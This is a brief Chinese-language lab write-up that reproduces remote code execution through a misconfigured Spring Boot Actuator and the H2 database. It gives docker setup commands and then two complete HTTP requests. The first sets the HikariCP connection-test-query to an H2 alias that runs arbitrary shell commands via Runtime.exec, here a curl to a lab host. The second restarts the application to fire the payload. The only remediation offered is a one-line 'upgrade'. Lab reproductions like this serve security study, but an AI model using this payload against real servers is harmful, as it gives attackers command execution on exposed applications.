漏洞概述
Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。
环境搭建
先把git项目克隆下来
git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
然后进入目录并启动环境
cd spring-boot-actuator-h2-rce
docker build -t spaceraccoon/spring-boot-rce-lab .
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab
接着访问:http://your-ip:8080/actuator
漏洞复现
发送如下POST包配置spring.datasource.hikari.connection-test-query的值
POST /actuator/env HTTP/1.1
Host: 192.168.204.131:8080
Content-Type: application/json
Content-Length: 358
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 192.168.204.131:8085');"}
向端点 /actuator/restart 发送POST请求,重启应用
POST /actuator/restart HTTP/1.1
Host: 192.168.204.131:8080
Content-Type: application/json
Content-Length: 2
{}
成功执行
修复建议
升级到安全版本